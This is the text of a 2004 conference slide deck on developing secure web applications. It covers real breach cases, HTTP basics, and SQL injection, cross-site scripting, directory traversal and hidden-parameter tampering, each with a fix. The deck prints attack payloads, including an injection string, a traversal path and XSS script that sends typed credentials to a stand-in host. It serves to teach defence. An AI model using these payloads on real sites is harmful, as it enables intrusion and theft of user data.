T16 September 30, 2004 3:00 PM D EVELOPING S ECURE W EB A PPLICATIONS - - PDF document

BIO PRESENTATION Better Software Conference & EXPO September 27-30, 2004 San Jose, CA USA

T16

September 30, 2004 3:00 PM

DEVELOPING SECURE WEB APPLICATIONS

Dennis Hurst SPI Dynamics Inc

Dennis Hurst

Dennis Hurst, senior consulting engineer for SPI Dynamics, is responsible for working with developers to educate them on the need for Web Application security and practical ways to protect Web Applications from hacking attacks. With more than 15 years experience in the Information Systems/Application development industry, he is an expert in system design, implementation and maintenance of complex multi- vendor, multi-platform computer applications and networks. He has extensive experience in planning developing and enhancing Internet systems as well as integrating Internet systems with legacy systems. For the past three years he has focused on developing tools to test and secure the HTTP protocol. Dennis is a Microsoft Certified Solution Developer (MSCD in Visual Basic and SQL Server) and a Certified Novell Engineer (CNE) for version 3.x and 4.x. Furthermore, he has published articles and developed classes on the secure application development process. Dennis has spoken on the topic of secure coding practices at Software Development West 2004, WebSec 2003 and various user group chapter meetings. He has been published in asp.net PRO and on http://www.15seconds.com/Issue/000612.htm.

Hacker Exploits, Coding Best Practices and Automated Code Testing Tools

Developing Secure Web Applications

Agenda

PART 1: Introductions PART 2: What is Web Application Security? PART 3: Web Application Hacks & Application Risks PART 4: Web Applications and HTTP 101 PART 5: Web Application Attacks PART 6: Managing & Detecting Vulnerabilities

SPI Dynamics

SPI Dynamics delivers security products and services that protect enterprises at the web application

• layer. These products are backed by the industry’s

leading security experts, SPI Labs. WebInspect is our industry leading web application security assessment product line and is licensed to enterprises, consultants, and other institutions, both directly and via global partners.

The Expert in Web Application Security Assessment

SPI Dynamics believes that security must be implemented across the application lifecycle. The earlier a security defect is detected the less it will ultimately cost an organization. SPI Dynamics is dedicated to maintaining a leadership position in vulnerability assessment and we truly measure our success through the success of

• ur customers.

SPI Dynamics The Expert in Web Application Security Assessment

PART 2 What is Web Application Security?

The evolution from web sites to web applications Where does the risk come from?

Web Sites

Web Server HTML Browser

Simple, single server solutions

Web Applications

Browser

Web Servers Presentation Layer Media Store

Very complex architectures, multiple platforms, multiple protocols

Database Server Customer Identification Access Controls Transaction Information Core Business Data

Wireless Web Services

Application Server Business Logic Content Services

Web Applications Invite Public Access

“Today over 70% of attacks against a company’s website or web application come at the ‘Application Layer’ not the Network

• r System layer.”
• Gartner

Web Applications Breach the Perimeter

HTTP(S)

INTERNET DMZ TRUSTED INSIDE CORPORATE INSIDE FTP TELNET

Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server.

Any – Web Server: 80

Firewall only allows applications

• n the web server to talk to

application server.

Web Server Application Server

Firewall only allows application server to talk to database server.

Application Server Database IMAP SSH POP3 IIS SunOne Apache ASP .NET WebSphere Java SQL Oracle DB2

PART 3 Web Application Hacks and Application Risks

Who got hacked? How they got hacked, what method was used? What was the result of being hacked? Why web application risks occur Web application vulnerabilities

Web Application Risk

“Web application incidents cost companies more than $320,000,000 in 2001.” Forty-four percent (223 respondents) to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial

• losses. These 223 respondents reported

$455,848,000 in financial losses.

“2002 Computer Crime and Security Survey” Computer Security Institute & San Francisco FBI Computer Intrusion Squad

Ziff Davis

Hacked August 2002 Ziff Davis Media has agreed to revamp its website's security and pay affected customers $500 each after lax security exposed the personal data of thousands of subscribers last year. The agreement between Ziff Davis -- publisher of PC Magazine and other tech titles, including a slew of gaming magazines -- and attorneys general from New York, Vermont and California came after web surfers discovered an unprotected data file on Ziff Davis' site in November. The file contained names, addresses, e-mail addresses -

• and, in some instances, credit card numbers -- of

12,000 people who signed up for a special promotion to receive Electronic Gaming Monthly magazine.

Recent Web Application Hack Example

Recent Web Application Hacks

Victoria’s Secret, November 27, 2002 A vulnerability at the Victoria’s Secret web site allowed customers who purchased items there to view other customers’ orders. By simply changing the data in the URL address line the web application was manipulated. $50,000 fine and publicity in 2003

Victoria’s Secret

Recent Web Application Hacks

January 3, 2003 RIAA was hacked 8 times in 6 months The 6th time the RIAA site was hacked, downloadable, pirated music was posted This time, a URL allowing access to the RIAA's system for posting press releases was made publicly accessible, allowing people to post messages that then appeared

• n the RIAA's official press

release page

Recording Industry Association of America

Sept 25th 2003: Car Shoppers Credit Details Exposed in Bulk An administrative page not properly secured and any personal loan application information could be viewed. Over 1,000 shoppers from multiple websites had their entire financial history exposed on a public site The researcher simply read the HTML comments, saw the filename, and typed it into his browser.

“The exposure of personal financial information could also put Dealerskins and its customers afoul of Federal Trade Commission (FTC) regulations “

Gateway Computers

Wall Street Journal Article “More Scary Tales Involving Big Holes in Website Security”, by Lee Gomes, February 2nd 2004 Gateway’s website stored an ID number in a cookie to identify you when returning to the site. By changing this ID number, you are able to view the information of

• ther shoppers. Information viewable includes Name,

Address, Phone Number, Order History, Last Four Digits of Credit Card, Credit Card Expiration Date, Credit Card Verification Code.

Federal Trade Commission investigates Guess Inc.

“Guess Settles with FTC over Cyber Security Snafu”, June 2003 by Kevin Poulson for SecurityFocus “ Guess.com was open to an "SQL injection attack," permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all …The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess “ "Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."

Other Hacked Websites

Tiffany.Com - 2004 SQL Injection, OpenTable.com : Non-random identifiers Saks Fifth Avenue: Non-random identifiers FTD.com – February 14, 2003 sequential cookies Source: CNET News “FTD Hole Leaks Personal Information “ Travelocity - January 22, 2001 open directory Source: CNET News “Travelocity Exposes Customer Information” Creditcards.com – December 12, 2000 SQL Injection Source: CNET News “Company says extortion try exposes thousands of card numbers “ CD Universe – January 9, 2000 SQL Injection Source: Internetnews.com “Failed Blackmail Attempt Leads to Credit Card Theft” MasterCard - February 17, 2003 Partner Liability Tower Records - December 5, 2002 Access permissions

Security Professionals Don’t Know The Applications

The Web Application Security Gap

Application Developers and QA Professionals Don’t Know Security

Why Web Application Risks Occur

Developers Are Not Security Professionals

Application development stresses functionality, not security Lack of awareness of security issues in development Lack of effective testing tools in Development & QA Resource constrained development teams

Security Professionals Are Not Developers

Lack of awareness of application vulnerabilities in security teams Lack of effective testing tools Certification and accreditations don’t examine the web application Development cycle missing from security procedures and audits Security scrutinizes the desktop, the network, and the server. The web application is missing.

Why Web Application Risks Occur

Web Application Vulnerabilities

Platform Administration

Application

Known Vulnerabilities Extension Checking Common File Checks Data Extension Checking Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Parameter Manipulation Cross-Site Scripting SQL Injection Buffer Overflow Reverse Directory Transversal JAVA Decompilation Path Truncation Hidden Web Paths Cookie Manipulation Application Mapping Backup Checking Directory Enumeration

Web application vulnerabilities

• ccur in multiple areas.

Platform

Known Vulnerabilities

Platform:

• Known vulnerabilities can be

exploited immediately with a minimum amount of skill or experience – “script kiddies”

• Most easily defendable of all web

vulnerabilities

• MUST have streamlined patching

procedures

• MUST have inventory process

Web Application Vulnerabilities

Administration

Extension Checking Common File Checks Data Extension Checking Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing

Administration:

• Less easily corrected than known issues
• Require increased awareness
• More than just configuration, must be

aware of security flaws in actual content

• Remnant files can reveal applications

and versions in use

• Backup files can reveal source code and

database connection strings

Web Application Vulnerabilities

Application Programming:

• User input is not examined from a

security perspective.

• Unexpected code
• Error messages……

Application

Web Application Vulnerabilities

Parameter Manipulation Cross-Site Scripting SQL Injection Buffer Overflow Reverse Directory Transversal JAVA Decompilation Path Truncation Hidden Web Paths Cookie Manipulation Application Mapping Backup Checking Directory Enumeration

PART 4 Web Applications and HTTP 101

What are the components of a web application? How are these components secured? How does HTTP (the web) work? How does a hacker see your application?

The OSI Reference Model

Physical Datalink Network Transport Session Presentation Web based attacks (HTTP/HTTPS) Network / OS / Service attacks Layer 1 through 6 deal with how data is delivered. Layer 7 deals with business logic (content and interpretation). Application

Network

What is a Web-Based Application?

What is the data path (Network) for web applications? How does a web-based application work (HTTP)? How does your application work?

HTTP Web Application

How Do Web Applications Communicate?

Network HTTP Web Application

Network Layer

Client connects to the server Client sends request to server Server responds to client Connection is disconnected

HTTP is stateless Request Response Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123)

How Do Web Applications Communicate?

Network Layer

SSL (Secure Sockets Layer)

Provided encryption of data between a client and server. Typically guarantees to client that server is who it asserts itself to be.

Securing the Network Layer

SSL Tunnel Server www.mybank.com (64.58.76.230) Port: 443 Client PC (10.1.0.123)

Securing the Network Layer

SSL Firewalls Allows or disallows traffic to pass from the external network to the internal network. Acts as a “traffic cop” Port 80 (HTTP) and port 443 (HTTPS) travel freely through the firewall.

SSL Tunnel Server www.mybank.com (64.58.76.230) Port: 443 Client PC (10.1.0.123)

Securing the Network Layer

SSL Firewalls IDS (Intrusion Detection System)

Monitors network for malicious activities Typically signature based detection (similar to virus protection) Blind to encrypted (SSL) traffic.

IDS SSL Tunnel Server www.mybank.com (64.58.76.230) Port: 443 Client PC (10.1.0.123)

What is HTTP?

Network HTTP Web Application

What is HTTP?

HTML Page

<a href=http://www.test.me>Click Here</a>

Request Response

GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) Host: www.spidynamics.com Connection: Keep-Alive HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 07 Apr 2003 12:52:26 GMT Content-Length: 10225 Content-Type: text/html Cache-control: private Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/; <html> <body>

Request Response Server Client PC

HTML Page

<a href=http://www.test.me>Click Here</a>

Request

GET / HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) Host: www.spidynamics.com Connection: Keep-Alive

Response

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Mon, 07 Apr 2003 12:52:26 GMT Content-Length: 10225 Content-Type: text/html Cache-control: private Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/; <html> <body>

How Does Your Application Work?

GET – Simple query string based request POST – Contains POST data in the body of the request.

Network HTTP Web Application

HTTP – GET With a Query String

HTML Page

<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>

Request Response

GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) Host: www.company.com Connection: Keep-Alive Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 04 Apr 2003 15:17:50 GMT Content-Length: 4183 Content-Type: text/html Cache-control: private Set-Cookie: sessionid=25; path=/; Set-Cookie: state=GA; path=/; Set-Cookie: username=MrUser; path=/; Set-Cookie: userid=1538; path=/; <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY>

HTML Page

<a href=http://www.test.me/banklogin.asp?serviceName=Freebank CaastAccess&ID=5 >Click Here</a>

Request

GET /banklogin.asp?serviceName=FreebankCaastAccess& templateName=prod_sel.forte&ID=5 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) Host: www.company.com Connection: Keep-Alive Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN

Response

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 04 Apr 2003 15:17:50 GMT Content-Length: 4183 Content-Type: text/html Cache-control: private Set-Cookie: sessionid=25; path=/; Set-Cookie: state=GA; path=/; Set-Cookie: username=MrUser; path=/; Set-Cookie: userid=1538; path=/; <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY>

HTTP – POST With POST Data

Form Request Response

<FORM ACTION="login1.asp" METHOD=“POST"><br> Username:<INPUT TYPE="text" NAME="login"><BR> Password:<INPUT TYPE="password" NAME="password" ><BR> <INPUT TYPE="submit"><BR> </FORM> POST /login1.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/* Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccess Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) Host: www.company.com Content-Length: 23 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;…… login=John&password=Doe HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 04 Apr 2003 15:35:00 GMT Content-Length: 80 Content-Type: text/html Cache-control: private <html> <body> Welcome John. …………..</body></html>

Form

<FORM ACTION="login1.asp" METHOD=“POST"><br> Username:<INPUT TYPE="text" NAME="login"><BR> Password:<INPUT TYPE="password" NAME="password" ><BR> <INPUT TYPE="submit"><BR> </FORM>

Request

POST /login1.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/* Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccess Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) Host: www.company.com Content-Length: 23 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;…… login=John&password=Doe

Response

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 04 Apr 2003 15:35:00 GMT Content-Length: 80 Content-Type: text/html Cache-control: private <html> <body> Welcome John. …………..</body></html>

PART 5 Web Application Attacks

Question

Define – What is it and what is at stake? Result – How does it happen? Fix – How to fix web application vulnerabilities?

Types of Attacks

SQL Injection Cross Site Scripting (XSS) Directory Traversal Hidden parameters

SQL Injection – Defined

SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first.

SQL Injection – Simple Example

‘/ ‘/ Login SQL Statemet ‘/ SQLtemp = "SELECT * FROM Users " & _ "WHERE userID = '" & Request.form("username") & "' " & _ "and pass = '" & Request.Form("password") & "'" Set rs = Apples.Execute(SQLtemp) If not rs.eof then ‘/ Successful login!! …..

‘/ ‘/ Login SQL Statemet ‘/ SQLtemp = "SELECT * FROM Users " & _ "WHERE userID = '" & Request.form("username") & "' " & _ "and pass = '" & Request.Form("password") & "'" Set rs = Apples.Execute(SQLtemp) If not rs.eof then ‘/ Successful login!! …..

SQL Injection – Simple Example

Return Response

SQL Example

SQL Injection – Simple Example

What the hacker knows

The web page is creating a SQL statement that takes two parameters. The parameters are both strings. The parameters are, most likely, being passed to the database unfiltered.

The hacker can now guess that the SQL statement looks something like this: The hack can now start making educated guesses:

Select <something> from <sometable> where <fieldone> = ‘<user input one>’ And <fieldtwo> = ‘<user input two>’ Select <something> from <sometable> where <fieldone> = ‘' or 1=1 or 'a' ='’ And <fieldtwo> = ‘' or 1=1 or 'a' ='’

SQL Injection – Simple Example

SQL Example

SQL Injection – Solution

Use parameterized queries Trap your Errors!!! Don’t let the environment Use Stored Procedures Validate User Input Turn off default error messages

cnn = new SqlConnection(…database connection information here…); cmd = new SqlCommand("SELECT FirstName, LastName from Users “ + "WHERE UserName = @uid AND password = @passwd",cnn); cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value=uid; cmd.Parameters.Add("@passwd", SqlDbType.VarChar,100).Value = passwd; cnn.Open();

Cross Site Scripting (XSS)

Cross-site scripting (also know as XSS or CSS)

• ccurs when dynamically generated web pages

display input that is not property validated. A user passes input in the form of a parameter to the web server. The web server returns the user provided input back to the user without proper encoding.

http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20<script>alert(document.cookie)</script>

Cross Site Scripting (XSS)

<input type=text name=txtUserID …. <input type=text name=txtPassword… HTML var oImg = new Image;

• Img.src = "http://www.test.me/"

+ document.frmTest.txtUserID.value + "." + document.frmTest.txtPassword.value; XSS JavaScript Web Log …. 127.0.0.1 GET /test/xss.asp 200 …. 127.0.0.1 GET /MyUserID.MyPassword 404 …. 127.0.0.1 GET /test/xss.asp 200

Cross Site Scripting (XSS) - Solution HTML Encode all data before it is RETURNED to a users web browser.

Data that comes from a user Data that comes from a database Data that comes from any dynamic source

Server.HTMLEncode provides this functionality Validate user input

Directory Traversal – Result

This is a standard site that shows a list of available documents in the FAQ folder.

Directory Traversal – Result

Clicking on one of the links shows the selected document. Notice the parameter ?Template=Check+Card%2Etxt. When you URL Decode that parameter it will look like:

?Template=Check Card.txt This could be a file name.

Directory Traversal – Result

Changing the Template parameter to ../../../../../boot.ini opened the boot.ini file. A hacker now has full access to any file on the hard drive.

Directory Traversal – The Code

The vulnerable code Secure version of the code

sFile = Request("Template“) ‘/Get the parameter if sFile <> "" then ‘/User passed a parameter if fso.FileExists(sDir & "\" & sFile) then set oStream = fso.OpenTextFile(sDir & "\" & sFile,1, false) sFile = Request("Template“) ‘/Get the parameter '/Quick security check if Regex.Match(sFile, “[^a-zA-Z0-9.]”) <> “” then ‘/Look for invalid characters sFile = "“ ‘/Looks odd, don’t accept it end if if sFile <> "" then ‘/User passed a parameter if fso.FileExists(sDir & "\" & sFile) then set oStream = fso.OpenTextFile(sDir & "\" & sFile,1, false)

Directory Traversal - Fix

Avoid using a parameter as a file name. When using a parameter as a file name use EXTREME caution to ensure that the name passed in is a valid file name and is not trying to reference a file in a parent folder. Limit the web server to only access appropriate folders on the web server and not parent folders outside the web site file structure. ….and….. Validate user input

Hidden Parameters

Hidden parameters allow developers to pass variables to and from a web browser in the same way other <input> tags do, however they are not seen by the end user. The format is <input type=hidden name=myname value=myvalue> The primary danger in using hidden parameters is that they can be modified by a hacker and are seldom tested during the development and QA process.

Hidden Parameters - Example

Hidden Parameters - Example

Hidden Parameters - Example

Hidden Parameters – The Hack

Request before the hack Request after the hack

POST /BankSite/xferconfirm.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: http://www.nubank.me/BankSite/acctxfer.asp Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705) Host: www.nubank.me Content-Length: 103 Connection: Close Cache-Control: no-cache Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer POST /BankSite/xferconfirm.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Referer: http://www.nubank.me/BankSite/acctxfer.asp Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: identity User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705) Host: www.nubank.me Content-Length: 103 Connection: Close Cache-Control: no-cache Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe

Hidden Parameters – The Hack

Hidden Parameters – The Fix

Never assume a hidden parameter has not been tampered with by the end user. Never put secure information in a hidden parameter. Ensure that proper QA testing of all hidden parameters is done prior to going live with any application. Add proper hidden parameter use guidelines to development methodology documents and processes. ….and again….validate user input

The fix – Trust buy verify Validate ALL user input Validate every time you use user input Everything in a request is “user input”

PART 6

Managing and Detecting Web Application Vulnerabilities Building a secure development process Web application ROI Detecting web application vulnerabilities Managing and addressing web application security risk throughout the enterprise

Application Lifecycle Phases

Design Development Testing Production Security Operations and Auditors Developers QA and Developers Auditors, Dev, and Business Subject Matter Experts (SME)

Application Lifecycle Phases

Design Development Testing Production Security Operations and Auditors Developers QA and Developers Auditors, Dev, and Business Subject Matter Experts (SME)

Application Lifecycle Phases

Design Development Testing Production Security Operations and Auditors Developers QA and Developers Auditors, Dev, and Business Subject Matter Experts (SME)

Managing Web Application Security Risk

Educate the development team. Develop and publish best practices. Develop secure code Test and verify that code is developed securely Perform routine audits of production systems. Establish remediation procedures. Keep track of security trends.

Bring security to the development team…

Detecting Web Application Vulnerabilities

Time consuming Expensive Not repeatable Time consuming Rely on third party individuals (penetration testers) High performance, automated web application assessment Cost effective Scalable throughout entire application lifecycle Consistent high quality assessments Provides economy of scale (SPI Labs) Customizable (Custom Agents)

Manual vs. Automatic Testing

Q&A Questions?